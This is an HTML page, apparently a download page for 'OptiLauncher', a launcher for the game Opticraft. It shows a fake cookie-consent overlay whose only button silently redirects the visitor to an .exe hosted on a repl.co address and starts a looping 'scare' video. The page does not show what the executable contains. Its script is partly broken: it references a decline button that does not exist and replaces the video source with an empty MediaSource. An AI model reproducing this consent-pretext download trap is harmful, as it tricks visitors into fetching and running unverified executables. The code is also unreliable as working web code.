<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<title>OptiLauncher</title>
<meta property="og:title" content="OptiLauncher">
<meta property="og:url" content="https://theanx.github.io/">
<meta property="og:site_name" content="OptiLauncher">
<meta property="og:image" content="https://static-cdn.jtvnw.net/jtv_user_pictures/188476f8-f455-45a3-b5dd-c80c880bfc57-profile_image-300x300.png">
<meta property="og:description" content="Launcher para Opticraft">
<meta property="og:type" content="website">
<meta name="twitter:card" content="photo">
<meta name="twitter:title" content="Screenshot">
<meta name="twitter:site" content="@optijuegos">
<meta name="twitter:description" content="Launcher para Opticraft">
<meta name="twitter:image:src" content="https://static-cdn.jtvnw.net/jtv_user_pictures/188476f8-f455-45a3-b5dd-c80c880bfc57-profile_image-300x300.png">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;900&display=swap" rel="stylesheet">
<style type="text/css">
            p {
                margin: 0;
            }

            *, *::before, *::after {
                box-sizing: border-box;
            }

            .overlay, .scare {
                position: fixed;

                top: 0;
                left: 0;

                height: 100vh;
                width: 100vw;
            }

            p.overlay-title {
                font-size: 24px;
                font-weight: 900;
                color: black;
                line-height: 1;

                margin-bottom: 16px;
            }

            .overlay-button {
                display: inline-flex;
                align-items: center;

                height: 40px;

                padding-right: 24px;
                padding-left: 24px;

                font-size: 16px;
                font-weight: 500;
                line-height: 1;

                border-radius: 4px;

                margin: 4px;

                cursor: pointer;
            }

            .overlay-buttons-wrapper {
                margin: 24px -8px -8px;
            }

            #accept-button {
                background-color: rgb(251, 220, 5);

                color: black;
            }

            #decline-button {
                color: rgb(0, 0, 0);

                border: 2px solid rgb(254, 249, 211);
            }

            p.overlay-description {
                font-size: 16px;
                font-weight: 400;
                color: rgba(0, 0, 0, 0.5);
                line-height: 1.25;

                margin-bottom: 16px;
            }

            a.overlay-link {
                display: inline-block;

                text-decoration: none;

                font-size: 16px;
                font-weight: 500;
                color: rgb(132, 94, 194);
                line-height: 1;

                position: relative;

                margin-top: 16px;
            }

            a.overlay-link::before {
                position: absolute;

                content: "";

                height: calc(50% + 4px);
                width: calc(100% + 8px);

                bottom: -4px;
                left: -4px;

                background-color: rgba(132, 94, 194, 0.1);
            }

            .overlay-body {
                max-width: 512px;

                text-align: center;

                font-family: "Inter", sans-serif;
            }

            .overlay[hidden] {
                display: none;
            }

            .overlay {
                z-index: 2;

                display: flex;
                align-items: center;
                justify-content: center;

                background-color: #f5f6fa;

                padding-right: 24px;
                padding-left: 24px;
            }

            .scare {
                z-index: 1;
            }

            video#video {
                height: 100%;
                width: 100%;

                object-fit: cover;
            }

            video#video::-webkit-media-controls-enclosure {
                display:none !important;
            }
        </style>
</head>
<body>
<div id="overlay" class="overlay">
<div class="overlay-body">
<p class="overlay-title">Acepta las cookies antes de continuar</p>
<b class="overlay-description">Al aceptar las cookies permites que podamos seguir sacando actualizaciones del launcher gracias a Google ADS</b>
<div class="overlay-buttons-wrapper">
<div id="accept-button" class="overlay-button">Aceptar</div>
</div>
</div>
</div>
<div class="scare">
<video id="video" class="video" src="milei.mp4" loop></video>
</div>
<script type="text/javascript">
    const video = document.getElementById("video");
    const overlay = document.getElementById("overlay");
    const declineButton = document.getElementById("decline-button");
    const acceptButton = document.getElementById("accept-button");

    let hasClicked;

    function buttonClick(event) {
        if(!hasClicked) hasClicked = true;
        overlay.hidden = true;
        location.href = 'http://orl.theanx9.repl.co/OptiLauncherU.exe'
        video.play();
        videoClick();
    }

    acceptButton.addEventListener("click", buttonClick);
    declineButton.addEventListener("click", buttonClick);
    video.addEventListener("click", videoClick);

    // Add MediaSource and SourceBuffer
    const mimeCodec = 'video/mp4; codecs="avc1.42E01E, mp4a.40.2"';
    if ("MediaSource" in window && MediaSource.isTypeSupported(mimeCodec)) {
        const mediaSource = new MediaSource();
        video.src = URL.createObjectURL(mediaSource);
        mediaSource.addEventListener('sourceopen', () => {
            const sourceBuffer = mediaSource.addSourceBuffer(mimeCodec);
            // fetch arrayBuffer and append it to sourceBuffer
        });
    } else {
        console.error("Unsupported MIME type or codec: ", mimeCodec);
    }
</script>
</body>